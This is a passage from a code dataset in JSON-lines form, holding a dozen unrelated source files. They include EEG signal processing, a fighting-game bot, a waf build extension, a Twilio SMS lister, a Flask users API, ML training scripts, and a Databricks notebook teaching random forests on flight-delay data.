__init__(self):\n\t\tself.data_path \t= '/usr/scratch/xavier/herschmi/EEG_data/physionet/' #data path\n\t\tself.obtain_filter = True # need to reobtain filters\n\t\tself.run_channel_selection = True # need to select channels\n\t\tself.channel_selection_method = 1 # 1: w squared sum, 2: csp-rank\n\n\t\tself.fs = 160. # sampling frequency\n\t\tself.NO_channels = 64 # number of EEG channels\n\t\tself.NO_selected_channels = 8 # number of selected channels\n\t\tself.NO_subjects = 105 # number of subjects\n\t\tself.NO_csp = 12 # Total number of CSP features per band and timewindow\n\t\tself.NO_classes = 4\n\n\t\tself.bw = np.array([26]) # bandwidth of filtered signals\n\t\tself.ftype = 'butter' # 'fir', 'butter'\n\t\tself.forder= 2 # 4\n\t\tself.filter_bank = load_filterbank(self.bw,self.fs,order=self.forder,max_freq=30,ftype = self.ftype) # get filterbank coeffs\n\t\tself.NO_bands = self.filter_bank.shape[0]\n\n\t\ttime_windows_flt = np.array([\n\t\t\t\t\t\t\t\t\t[0,1],\n\t\t\t\t\t\t\t\t\t[0.5,1.5],\n\t\t\t\t\t\t\t\t\t[1,2],\n\t\t\t\t\t\t\t\t\t[1.5,2.5],\n\t\t\t\t\t\t\t\t\t[2,3],\n\t\t\t\t\t\t\t\t\t[0,2],\n\t\t\t\t\t\t\t\t\t[0.5,2.5],\n\t\t\t\t\t\t\t\t\t[1,3],\n\t\t\t\t\t\t\t\t\t[0,3]])*self.fs # time windows in [s] x fs for using as a feature\n\t\tself.time_windows = time_windows_flt.astype(int)\n\t\tself.time_windows = self.time_windows[8] # use only largest timewindow\n\t\tself.NO_time_windows = int(self.time_windows.size/2)\n\n\t\tself.NO_features = self.NO_csp*self.NO_bands*self.NO_time_windows\n\n\tdef load_data(self):\n\t\t#load data\n\t\tnpzfile = np.load(self.data_path+f'{self.NO_classes}class.npz')\n\t\tself.train_data, self.train_label = npzfile['X_Train'], npzfile['y_Train']\n\n\tdef run_csp(self):\n\t\t# obtaining the set of 12 spatial filters across an average of all subjects.\n\t\tself.load_data()\n\n\t\tw_4d = generate_projection(self.train_data,self.train_label,self.NO_csp,self.filter_bank,self.time_windows,self.NO_classes) # obtain filter\n\t\tw = dimension_reduction(w_4d, self.NO_channels, self.NO_csp) # dimension reduction (for multiscale CSP)\n\n\t\tnp.savetxt(f'{results_dir}/w_{self.NO_classes}class_csp.csv', w) # saving file\n\n\tdef channel_selection(self):\n\t\t# channel selection from saved spatial filters\n\t\tw = np.loadtxt(open(f'{results_dir}/w_{self.NO_classes}class_csp.csv', \"rb\"), delimiter=\" \")\n\n\t\tif self.channel_selection_method == 1: #V1 using w squared sum\n\t\t\tselected_channels = channel_selection_squared_sum(w, self.NO_channels, self.NO_selected_channels)\n\t\telif self.channel_selection_method == 2: # V2 using CSP-ranking\n\t\t\tselected_channels = channel_selection_csprank(w, self.NO_channels, self.NO_selected_channels, self.NO_csp)\n\n\t\treturn selected_channels\n\ndef main():\n\tprint(\"Starting program...\")\n\tmodel = CSP_Model()\n\n\tif model.obtain_filter:\n\t\tmodel.run_csp()\n\n\tif model.run_channel_selection:\n\t\tprint(\"The selected channels are: \")\n\t\tprint(model.channel_selection())\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"main_csp.py","file_name":"main_csp.py","file_ext":"py","file_size_in_byte":3428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"230140417","text":"\"\"\"\r\nA simple bot that presses buttons when emerging from block or hit stun.\r\n\r\n\"\"\"\r\n\r\nfrom Bot import Bot\r\nfrom TekkenGameState import TekkenGameState\r\nfrom BotData import BotBehaviors\r\nfrom NotationParser import ParseMoveList\r\n\r\n\r\nclass BotFrameTrap(Bot):\r\n\r\n 
def __init__(self, botCommands):\r\n super().__init__(botCommands)\r\n self.SetFrameTrapCommandFromNotationString(\"+4\")\r\n\r\n\r\n def Update(self, gameState: TekkenGameState):\r\n BotBehaviors.Basic(gameState, self.botCommands)\r\n\r\n if self.botCommands.IsAvailable():\r\n BotBehaviors.BlockAllAttacks(gameState, self.botCommands)\r\n if gameState.IsBotBlocking() or gameState.IsBotGettingHit():\r\n self.botCommands.AddCommand(self.response)\r\n\r\n\r\n def SetFrameTrapCommandFromNotationString(self, notation: str):\r\n try:\r\n self.response = ParseMoveList(\">, \" + notation)\r\n except:\r\n print(\"Could not parse move: \" + notation)\r\n\r\n","sub_path":"BotFrameTrap.py","file_name":"BotFrameTrap.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"563405902","text":"#! /usr/bin/env python\n\"\"\"\nThis tool supports the export_symbols_regex to export the symbols in a shared library.\nby default, all symbols are exported by gcc, and nothing by msvc.\nto use the tool, do something like:\n\ndef build(ctx):\n\tctx(features='c cshlib syms', source='a.c b.c', export_symbols_regex='mylib_.*', target='testlib')\n\nonly the symbols starting with 'mylib_' will be exported.\n\"\"\"\nimport re\n\nfrom waflib.Context import STDOUT\nfrom waflib.Errors import WafError\nfrom waflib.Task import Task\nfrom waflib.TaskGen import after_method\nfrom waflib.TaskGen import feature\n\n\nclass gen_sym(Task):\n def run(self):\n obj = self.inputs[0]\n kw = {}\n\n reg = getattr(self.generator, \"export_symbols_regex\", \".+?\")\n if \"msvc\" in (self.env.CC_NAME, self.env.CXX_NAME):\n re_nm = re.compile(r\"External\\s+\\|\\s+_(?P%s)\\b\" % reg)\n cmd = (self.env.DUMPBIN or [\"dumpbin\"]) + [\"/symbols\", obj.abspath()]\n else:\n if (\n self.env.DEST_BINFMT == \"pe\"\n ): # gcc uses nm, and has a preceding _ on windows\n re_nm = re.compile(r\"(T|D)\\s+_(?P%s)\\b\" % reg)\n elif self.env.DEST_BINFMT == \"mac-o\":\n re_nm = re.compile(r\"(T|D)\\s+(?P_?%s)\\b\" % reg)\n else:\n re_nm = re.compile(r\"(T|D)\\s+(?P%s)\\b\" % reg)\n cmd = (self.env.NM or [\"nm\"]) + [\"-g\", obj.abspath()]\n syms = [\n m.group(\"symbol\")\n for m in re_nm.finditer(\n self.generator.bld.cmd_and_log(cmd, quiet=STDOUT, **kw)\n )\n ]\n self.outputs[0].write(\"%r\" % syms)\n\n\nclass compile_sym(Task):\n def run(self):\n syms = {}\n for x in self.inputs:\n slist = eval(x.read())\n for s in slist:\n syms[s] = 1\n lsyms = list(syms.keys())\n lsyms.sort()\n if self.env.DEST_BINFMT == \"pe\":\n self.outputs[0].write(\"EXPORTS\\n\" + \"\\n\".join(lsyms))\n elif self.env.DEST_BINFMT == \"elf\":\n self.outputs[0].write(\n \"{ global:\\n\" + \";\\n\".join(lsyms) + \";\\nlocal: *; };\\n\"\n )\n elif self.env.DEST_BINFMT == \"mac-o\":\n self.outputs[0].write(\"\\n\".join(lsyms) + \"\\n\")\n else:\n raise WafError(\"NotImplemented\")\n\n\n@feature(\"syms\")\n@after_method(\n \"process_source\",\n \"process_use\",\n \"apply_link\",\n \"process_uselib_local\",\n \"propagate_uselib_vars\",\n)\ndef do_the_symbol_stuff(self):\n def_node = self.path.find_or_declare(\n getattr(self, \"sym_file\", self.target + \".def\")\n )\n compiled_tasks = getattr(self, \"compiled_tasks\", None)\n if compiled_tasks:\n ins = [x.outputs[0] for x in compiled_tasks]\n self.gen_sym_tasks = [\n self.create_task(\"gen_sym\", x, x.change_ext(\".%d.sym\" % self.idx))\n for x in ins\n ]\n self.create_task(\n \"compile_sym\", [x.outputs[0] for x in self.gen_sym_tasks], def_node\n )\n\n 
link_task = getattr(self, \"link_task\", None)\n if link_task:\n self.link_task.dep_nodes.append(def_node)\n\n if \"msvc\" in (self.env.CC_NAME, self.env.CXX_NAME):\n self.link_task.env.append_value(\"LINKFLAGS\", [\"/def:\" + def_node.bldpath()])\n elif self.env.DEST_BINFMT == \"pe\":\n # gcc on windows takes *.def as an additional input\n self.link_task.inputs.append(def_node)\n elif self.env.DEST_BINFMT == \"elf\":\n self.link_task.env.append_value(\n \"LINKFLAGS\", [\"-Wl,-version-script\", \"-Wl,\" + def_node.bldpath()]\n )\n elif self.env.DEST_BINFMT == \"mac-o\":\n self.link_task.env.append_value(\n \"LINKFLAGS\", [\"-Wl,-exported_symbols_list,\" + def_node.bldpath()]\n )\n else:\n raise WafError(\"NotImplemented\")\n","sub_path":"docs/.mywaflib/waflib/extras/syms.py","file_name":"syms.py","file_ext":"py","file_size_in_byte":3880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"529137437","text":"from bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nimport jsonlines\nimport argparse\nimport time\nfrom tqdm import tqdm\n\n\ndef get_definition(driver, mag_url):\n driver.get(mag_url)\n html = None\n\n w = WebDriverWait(driver, 8)\n w.until(EC.presence_of_element_located((By.TAG_NAME, \"h1\")))\n print(\"Page load happened\")\n html = driver.page_source\n soup = BeautifulSoup(html, \"html.parser\")\n try:\n definitions = [\n x.get_text()\n for x in soup.find(\"div\", class_=\"name-section\").find_all(\n \"p\", text=True, recursive=False\n )\n ]\n if len(definitions) == 1:\n return definitions[0]\n else:\n return \"-1\"\n except:\n return \"-1\"\n\n\ndef get_defs_for_all_concepts(concepts, out_path):\n \"\"\"\n Process the concepts one by one\n \"\"\"\n count_all = len(concepts)\n with jsonlines.open(out_path, \"w\") as fout:\n driver = webdriver.Chrome(\"./webdriver/chromedriver_win64.exe\")\n count = 0\n for cid in tqdm(concepts):\n count += 1\n if count % 20 == 0:\n print(cid)\n time.sleep(100)\n url = f\"https://academic.microsoft.com/topic/{cid}/publication\"\n def_str = \"\"\n try:\n def_str = get_definition(driver, url)\n finally:\n fout.write({\"id\": cid, \"concept\": concepts[cid], \"definition\": def_str})\n driver.quit()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--concept_file\", default=\"./data/computer_science_jinfeng.terms\")\n parser.add_argument(\"--out_path\", default=\"./data/concept_definition.jsonl\")\n args = parser.parse_args()\n concepts = dict()\n with open(args.concept_file) as fin:\n for line in fin:\n cid, cpt = line.strip(\"\\n\\t\\r \").split(\"\\t\")[:2]\n concepts[cid] = cpt\n get_defs_for_all_concepts(concepts, out_path=args.out_path)\n","sub_path":"MAG_scrap_demo.py","file_name":"MAG_scrap_demo.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"243307416","text":"title=\"++ List received SMS messages\"\nimport os\nimport sys\nfrom datetime import date\nfrom twilio.rest import Client\n#\naccount_sid = os.environ.get(\"ACCOUNT_SID\")\nauth_token = os.environ.get(\"AUTH_TOKEN\")\nclient = Client(account_sid, auth_token)\n#\nif len(sys.argv) > 1:\n parDate = sys.argv[1];\n title = title + \" for the date: \" + parDate; # Example: 2018-06-13\n messages = 
client.messages.list(date_sent=date(int(parDate[:4]), int(parDate[5:7]), int(parDate[8:10])));\nelse:\n    messages = client.messages.list();\n#\nprint( title + \" (Date Time From To : Text):\")\nprevMsgDate = messages[0].date_sent.strftime('%Y-%m-%d');\nfor message in messages:\n    curMsgDate = message.date_sent.strftime('%Y-%m-%d');\n    if prevMsgDate != curMsgDate:\n        print()  # blank line between dates (bare 'print' was a no-op in Python 3)\n        prevMsgDate = curMsgDate;\n    if message.status == \"received\":\n        print(\"+ \" + message.date_sent.strftime('%Y-%m-%d %H:%M:%S') + \" \" + message.from_ + \" \" + message.to + \" : \" + message.body)\n        # Other data values: message.sid message.status\nprint(\"+ End of list.\")\n\n","sub_path":"notify/listSmsMsg.py","file_name":"listSmsMsg.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"451551794","text":"\"\"\"\nGiven a string s consisting of small lowercase English letters, find and return the first\ninstance of a non-repeating character in it. If there is no such character, return '_'.\n\nRequirement: Iterate over the string once and use O(1) additional memory\n\nSolution: Use an array of length 26 (alphabet size) to keep track of characters\n-2 means uninitialized\n-1 means repeated\nA non-negative number means the index of the first occurrence in the string s\n\nThen the smallest non-negative value in the array points to the first non-repeating character in s\n\"\"\"\ndef firstNotRepeatingCharacter(s):\n    array = [-2 for i in range(26)]\n\n    for i in range(len(s)):\n        index = ord(s[i]) - 97\n        # First occurrence:\n        if array[index] == -2:\n            array[index] = i\n        # Repetition detected:\n        elif array[index] != -1:\n            array[index] = -1\n\n    # Find smallest non-negative index\n    smallest = -1\n    for number in array:\n        if number < 0:\n            continue\n        elif smallest == -1 or number < smallest:\n            smallest = number\n\n    if smallest == -1:\n        return '_'\n    else:\n        return s[smallest]\n","sub_path":"arrays/firstNotRepeatingCharacter.py","file_name":"firstNotRepeatingCharacter.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"398784038","text":"import configparser\nimport argparse\nimport pickle\nimport json\nimport os\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVC\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import MultiLabelBinarizer\nfrom sklearn.metrics import f1_score\n\ndef load_data(data_path):\n    texts = []\n    tags = []\n    with open(data_path) as f:\n        for line in f:\n            item = json.loads(line)\n            texts.append(item[\"text\"])\n            tags.append(item[\"tags\"])\n    return texts, tags\n\ndef train(data_dir, model_dir, min_df=5, max_features=None, lowercase=True,\n          stopwords=\"english\", ngram_range=(1,1), kernel=\"linear\", class_weight=None):\n    print(\"Loading data\")\n    data_path = os.path.join(data_dir, \"data.jsonl\")\n    X, Y = load_data(data_path)\n\n    print(\"Fitting label binarizer\")\n    label_binarizer = MultiLabelBinarizer()\n    label_binarizer.fit(Y)\n\n    Y_vec = label_binarizer.transform(Y)\n\n    print(\"Splitting data\")\n    X_train, X_test, Y_train, Y_test = train_test_split(X, Y_vec, random_state=42)\n\n    print(\"Fitting model\")\n    model = Pipeline([\n        (\"tfidf\", TfidfVectorizer(\n            min_df=min_df,\n            max_features=max_features,\n            lowercase=lowercase,\n            stop_words=stopwords,\n            ngram_range=ngram_range\n        
)),\n (\"svm\", OneVsRestClassifier(SVC(\n kernel=kernel,\n class_weight=class_weight\n )))\n ])\n\n model.fit(X_train, Y_train)\n\n print(\"Evaluating model\")\n Y_pred = model.predict(X_test)\n f1 = f1_score(Y_test, Y_pred, average=\"micro\")\n print(f\"Score f1 {f1:.4f}\")\n\n model_path = os.path.join(model_dir, \"firebreak-model.pkl\")\n label_binarizer_path = os.path.join(model_dir, \"firebreak-label_binarizer.pkl\")\n with open(model_path, \"wb\") as f:\n f.write(pickle.dumps(model))\n with open(label_binarizer_path, \"wb\") as f:\n f.write(pickle.dumps(label_binarizer))\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--model_path\", type=str)\n parser.add_argument(\"--data_path\", type=str)\n parser.add_argument(\"--min_df\", type=int, default=5)\n parser.add_argument(\"--max_features\", type=int, default=None)\n parser.add_argument(\"--lowercase\", type=bool, default=True)\n parser.add_argument(\"--stopwords\", type=str, default=\"english\")\n parser.add_argument(\"--ngram_range\", type=tuple, default=(1,1))\n parser.add_argument(\"--kernel\", type=str, default=\"linear\")\n parser.add_argument(\"--class_weight\", type=str, default=None)\n parser.add_argument(\"--config\", type=str)\n parser.add_argument(\"--cloud\", action=\"store_true\")\n args = parser.parse_args()\n\n if args.config:\n cfg = configparser.ConfigParser(allow_no_value=True)\n cfg.read(args.config)\n \n data_path = cfg[\"input\"][\"path\"]\n model_path = cfg[\"output\"][\"path\"]\n min_df = cfg[\"tfidf\"].getint(\"min_df\", 5)\n max_features = cfg[\"tfidf\"].get(\"max_features\")\n lowercase = cfg[\"tfidf\"].getboolean(\"lowercase\", True)\n stopwords = cfg[\"tfidf\"].get(\"stopwords\", \"english\")\n ngram_range = cfg[\"tfidf\"].get(\"ngram_range\", [1,1])\n kernel = cfg[\"svm\"].get(\"kernel\", \"linear\")\n class_weight = cfg[\"svm\"].get(\"class_weight\")\n else:\n data_path = args.data_path\n model_path = args.model_path\n min_df = args.min_df\n max_features = args.max_features\n lowercase = args.lowercase\n stopwords = args.stopwords\n ngram_range = args.ngram_range\n kernel = args.kernel\n class_weight = args.class_weight\n \n if args.cloud:\n data_path = \"/opt/ml/input/data/training\"\n model_path = \"/opt/ml/models\"\n\n train(data_path, model_path, min_df, max_features,\n lowercase, stopwords, ngram_range, kernel, class_weight)\n\n","sub_path":"grants_tagger/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"80586966","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass AppleBarrel(Model):\n \"\"\"A barrel of apples.\n\n :param good_apples:\n :type good_apples: list[str]\n :param bad_apples:\n :type bad_apples: list[str]\n \"\"\"\n\n _attribute_map = {\n 'good_apples': {'key': 'GoodApples', 'type': '[str]', 'xml': {'name': 'GoodApples', 'itemsName': 'Apple', 'wrapped': True}},\n 'bad_apples': {'key': 'BadApples', 'type': '[str]', 'xml': {'name': 'BadApples', 'itemsName': 'Apple', 'wrapped': True}},\n }\n _xml_map = {\n }\n\n def __init__(self, *, good_apples=None, bad_apples=None, **kwargs) -> None:\n super(AppleBarrel, self).__init__(**kwargs)\n self.good_apples = good_apples\n self.bad_apples = bad_apples\n","sub_path":"test/vanilla/Expected/AcceptanceTests/Xml/xmlservice/models/apple_barrel_py3.py","file_name":"apple_barrel_py3.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"108324944","text":"model = Word2Vec(window = 10, sg = 1, hs = 0,\n negative = 10, # for negative sampling\n alpha=0.03, min_alpha=0.0007,\n seed = 14)\n\nmodel.build_vocab(purchases_train, progress_per=200)\n\nmodel.train(purchases_train, total_examples = model.corpus_count,\n epochs=10, report_delay=1)\n\nmodel2 = gensim.models.Word2Vec(data, min_count = 1, size = 100,\n window = 5, sg = 1)\n","sub_path":"Anuja/wordToVec_Gensim.py","file_name":"wordToVec_Gensim.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"448011269","text":"#!/usr/bin/python3\n\"\"\" amenity view file \"\"\"\nfrom api.v1.views import app_views\nfrom flask import jsonify, request, abort\nimport models\nfrom models import storage\nfrom models.user import User\n\n\n@app_views.route(\"/users\", strict_slashes=False, methods=['GET'])\ndef get_all_users():\n \"\"\" routing for retrieving all users \"\"\"\n users = storage.all(User).values()\n retval = []\n for obj in users:\n retval.append(obj.to_dict())\n return jsonify(retval)\n\n\n@app_views.route(\"/users/\", strict_slashes=False,\n methods=['GET'])\ndef get_one_user(user_id):\n \"\"\" gets an amenity from an amenity id \"\"\"\n user = storage.get(User, user_id)\n if user is None:\n abort(404)\n return jsonify(user.to_dict())\n\n\n@app_views.route(\"/users/\", strict_slashes=False,\n methods=['DELETE'])\ndef delete_user(user_id):\n \"\"\" deletes a user from id \"\"\"\n user = storage.get(User, user_id)\n if user is None:\n abort(404)\n storage.delete(user)\n storage.save()\n return jsonify({}), 200\n\n\n@app_views.route(\"/users\", strict_slashes=False, methods=['POST'])\ndef postcreate_user():\n \"\"\" creates new amenity object \"\"\"\n req = request.get_json()\n if req is None:\n abort(400, \"Not a JSON\")\n if \"email\" not in req:\n abort(400, \"Missing email\")\n if \"password\" not in req:\n abort(400, \"Missing password\")\n new_user = models.user.User(**req)\n new_user.save()\n return jsonify(new_user.to_dict()), 201\n\n\n@app_views.route(\"/users/\", strict_slashes=False,\n methods=['PUT'])\ndef user_update(user_id):\n \"\"\" updates the user \"\"\"\n user = storage.get(User, user_id)\n if user is None:\n 
abort(404)\n    req = request.get_json()\n    if req is None:\n        abort(400, \"Not a JSON\")\n    req.pop(\"id\", None)\n    req.pop(\"email\", None)\n    req.pop(\"created_at\", None)\n    req.pop(\"updated_at\", None)\n    for key, val in req.items():\n        setattr(user, key, val)\n    user.save()\n    return jsonify(user.to_dict()), 200\n","sub_path":"api/v1/views/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"266447029","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom pprint import pprint\nimport json\nfrom task import scrape_top_list\nAll_movies_data = scrape_top_list()\n\ndef group_by_decade(movies):\n    dec_list = []\n    dec_dict = {}\n    for i in movies:\n        y = int(i[\"Movies_year\"][1:5])\n        module = y%10\n        dec = y-module\n        if dec not in dec_list:\n            dec_list.append(dec)\n    dec_list.sort()\n    for i in dec_list:\n        dec_dict[i]=[]\n    for j in dec_dict:\n        a = j+9\n        for k in movies:\n            b = int(k[\"Movies_year\"][1:5])\n            if b<=a and b>=j:\n                dec_dict[j].append(k)\n    with open(\"decades_movies.json\", \"w\") as IMDB:\n        json.dump(dec_dict, IMDB, indent=4)\n    return dec_dict\ngroup_by_decade(All_movies_data)","sub_path":"task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"344027684","text":"# Databricks notebook source\n# MAGIC %md #### Create toy example of random forests for final notebook\n\n# COMMAND ----------\n\n# package imports\nfrom pyspark.sql.types import StructType, StructField, StringType, DoubleType, IntegerType, NullType, ShortType, DateType, BooleanType, BinaryType\nfrom pyspark.sql import SQLContext\nfrom pyspark.sql import types\nfrom pyspark.sql.functions import col, lag, udf, to_timestamp, monotonically_increasing_id\nimport pyspark.sql.functions as f\nfrom pyspark.sql.window import Window\nfrom pandas.tseries.holiday import USFederalHolidayCalendar\nfrom datetime import datetime, timedelta\nfrom pyspark.ml.feature import IndexToString, StringIndexer, OneHotEncoder, VectorAssembler, Bucketizer, StandardScaler\nimport pandas as pd\nfrom pyspark.ml.classification import RandomForestClassifier as RF, DecisionTreeClassifier as DT\nfrom pyspark.ml import Pipeline\n\n# COMMAND ----------\n\n# initialize the sql context\nsqlContext = SQLContext(sc)\n\n# COMMAND ----------\n\n# global variables\n\n# shared directory for our team (make sure it exists)\nfinal_project_path = \"dbfs:/mnt/mids-w261/group_5/\"\ndbutils.fs.mkdirs(final_project_path)\n\n# output paths\ntrain_data_output_path = final_project_path + \"training_data_output/train.parquet\"\ntest_data_output_path = final_project_path + \"training_data_output/test.parquet\"\ntrain_toy_output_path = final_project_path + \"training_data_output/train_toy.parquet\"\ntest_toy_output_path = final_project_path + \"training_data_output/test_toy.parquet\"\n\n# COMMAND ----------\n\ndisplay(dbutils.fs.ls(\"dbfs:/mnt/mids-w261/group_5\"))\n\n# COMMAND ----------\n\n# Read in parquet file\ntrain_set = spark.read.parquet(train_data_output_path)\n\n# COMMAND ----------\n\n# MAGIC %md ## Algorithm Implementation\n\n# COMMAND ----------\n\n# MAGIC %md We have selected Random Forests (RF) as the final model based on results from the above exploratory algorithm analysis. 
We will demonstrate a decision tree classifier using a toy example with 3 features from the flight delay training data and continue with an explanation of the RF algorithm. \n\n# COMMAND ----------\n\n# MAGIC %md #### Toy Example\n\n# COMMAND ----------\n\n# MAGIC %md ##### Example Data\n# MAGIC First we separate 20% of the training data that the toy model will use to make predictions. Then we select 3 features from the dataset to visualize the trees that RF will build and compile these into a feature vector for the model.\n\n# COMMAND ----------\n\n# Divide training data into train and test set with features for example\ntrain_toy, test_toy = train_set.select(\"label\", \"fl_date\", \"PREVIOUS_FLIGHT_DELAYED_FOR_MODELS_Index\", \"origin_avg_dep_delay\", \"day_of_week_Index\", \"crs_dep_hour_Index\", \"month_Index\").randomSplit([0.8, 0.2], seed = 1)\n\n# COMMAND ----------\n\n# Select 3 features and compile into feature vector\nfeatures = [\"PREVIOUS_FLIGHT_DELAYED_FOR_MODELS_Index\", \"origin_avg_dep_delay\", \"crs_dep_hour_Index\"]\nassembler = VectorAssembler(inputCols=features, outputCol=\"features\").setHandleInvalid(\"keep\")\n\ntrain_toy = assembler.transform(train_toy)\ntest_toy = assembler.transform(test_toy)\n\n# COMMAND ----------\n\ntrain_toy.write.format(\"parquet\").mode(\"overwrite\").save(train_toy_output_path)\ntest_toy.write.format(\"parquet\").mode(\"overwrite\").save(test_toy_output_path)\n\n# COMMAND ----------\n\ntrain_toy = spark.read.option(\"header\", \"true\").parquet(train_toy_output_path)\ntest_toy = spark.read.option(\"header\", \"true\").parquet(test_toy_output_path)\n\n# COMMAND ----------\n\n# MAGIC %md ##### Training Decision Trees \n# MAGIC \n# MAGIC Next we will train a decision tree. Each tree is constructed with a series of splitting rules. The example figure below builds one tree with 3 available features. The first node at the top of the tree is split based on whether the previous flight is delayed. From the right branch the next split is on scheduled departure hour of day. The tree increases depth by choosing the best split considering all features and split points. These splits divide the training examples into 7 regions, at the leaf nodes, based on the combination of their features. \n# MAGIC \n# MAGIC How does the model decide splits? Our classification tree splits at the point which minimizes the *gini index*, a measure of node purity. The equation for the gini index is shown below, where \\\\(\\hat{p}\\_{mk}\\\\) is the proportion of examples in region \\\\(m\\\\) of class \\\\(k\\\\). \n# MAGIC \n# MAGIC $$ G = \\sum\\_{k=1}^{K} {\\hat{p}\\_{mk} (1 - \\hat{p}\\_{mk})} $$\n# MAGIC \n# MAGIC The gini index will be minimized when \\\\(\\hat{p}\\_{m, k=0}\\\\) and \\\\(\\hat{p}\\_{m, k=1}\\\\) are close to 0 or 1, or when almost all the flight examples in the region are either delayed or not delayed. \n\n# COMMAND ----------\n\n# Simple decision tree model\ndt = DT(labelCol=\"label\", featuresCol=\"features\")\nDT_model = dt.fit(train_toy)\n\ndisplay(DT_model)\n\n# COMMAND ----------\n\n# MAGIC %md ##### Make Predictions\n# MAGIC To make a prediction using the decision tree, we assign a test data point to the leaf node (region) of the tree to which it belongs based on its features. The predicted class for a test example in region \\\\(m\\\\) is \\\\(argmax\\_k\\\\) \\\\(\\hat{p}\\_{mk}\\\\), or the majority class. \n# MAGIC \n# MAGIC Below is an example of a prediction on a test example; the next cell first sketches the leaf assignment by hand. 
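# COMMAND ----------

# MAGIC %md The next cell is a minimal, hand-rolled sketch of that leaf assignment, not output from the fitted model: the `traverse` helper and its threshold values are illustrative assumptions that mirror the tree pictured above, whereas the real split points live inside `DT_model`.

# COMMAND ----------

# Illustrative sketch only: a hypothetical traversal of the example tree above.
# The thresholds are assumed for exposition; real values come from DT_model.
def traverse(prev_delayed, dep_hour, origin_avg_delay):
    # Root split: was the previous flight of this aircraft delayed?
    if prev_delayed < 0.5:
        return 0.0                      # this branch ends in a majority "no delay" leaf
    # Next split: scheduled departure hour of day
    if dep_hour <= 14.0:
        return 0.0
    # Next split: average departure delay at the origin airport (minutes)
    if origin_avg_delay <= 14.6:
        return 0.0                      # this leaf region's majority class is "no delay"
    return 1.0                          # remaining region is majority "delay"

# The test example discussed below: previous flight delayed, hour 15, 12.9 min origin delay
print(traverse(prev_delayed=1.0, dep_hour=15.0, origin_avg_delay=12.9))  # 0.0 -> no delay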
For this example, the previous flight for the aircraft was delayed (feature 0 = 1) which moves down the left branch from the top of the tree. This flight's departure time is in hour 15, which moves it down the right branch of the next node. Next, the average delay at the origin airport 3 hours before is 12.9 minutes, which is less than the split point at 14.6 minutes. Lastly, repeating the hour of day feature for a split increases node purity and this flight is predicted to have no delay.\n\n# COMMAND ----------\n\n# Add row number to compare predictions for the same test example\ntest_toy = test_toy.withColumn(\"row\", f.monotonically_increasing_id())\n\n# COMMAND ----------\n\n# Predict on toy test set\npred_toy_DT = DT_model.transform(test_toy)\n\n# Create dataframe with predictions and show example\nlabelAndPrediction = pred_toy_DT.select(\"label\", \"row\", \"prediction\", \"features\")\ndisplay(labelAndPrediction.where(labelAndPrediction.row == 575525629176))\n\n# COMMAND ----------\n\n# MAGIC %md ##### RF Algorithm\n# MAGIC Averaging many trees grown from repeated bootstrap samples of the training data, known as bagging, reduces the variance that any single tree would exhibit. Bagging grows deep trees and does not prune. The RF training method goes a step further to decorrelate the trees: each node is randomly assigned a subset of features that will be considered as possible split candidates. This means that the trees will differ from each other, so averaging them decreases variance more than bagging alone. \n# MAGIC \n# MAGIC Below we will train an RF model on the same data using 3 trees.\n\n# COMMAND ----------\n\n# RF model\nrf = RF(labelCol=\"label\", featuresCol=\"features\", numTrees=3, maxDepth=5)\nRF_model = rf.fit(train_toy)\n\n# COMMAND ----------\n\n# Print tree nodes for all RF trees\nprint(RF_model.toDebugString)\n\n# COMMAND ----------\n\n# MAGIC %md ##### Prediction with RF\n# MAGIC RF then combines these predictions for all trees using a majority vote. If \\\\(\\hat{p}\\_{n,k}\\\\) is the proportion of predictions for class \\\\(k\\\\) over \\\\(n\\\\) trees, the majority vote is \\\\(argmax\\_k\\\\) \\\\(\\hat{p}\\_{n,k}\\\\).\n\n# COMMAND ----------\n\n# Predict on toy test set with RF\npred_toy_RF = RF_model.transform(test_toy)\n\n# Create dataframe with predictions and show example\nlabelAndPrediction_RF = pred_toy_RF.select(\"label\", \"row\", \"prediction\", 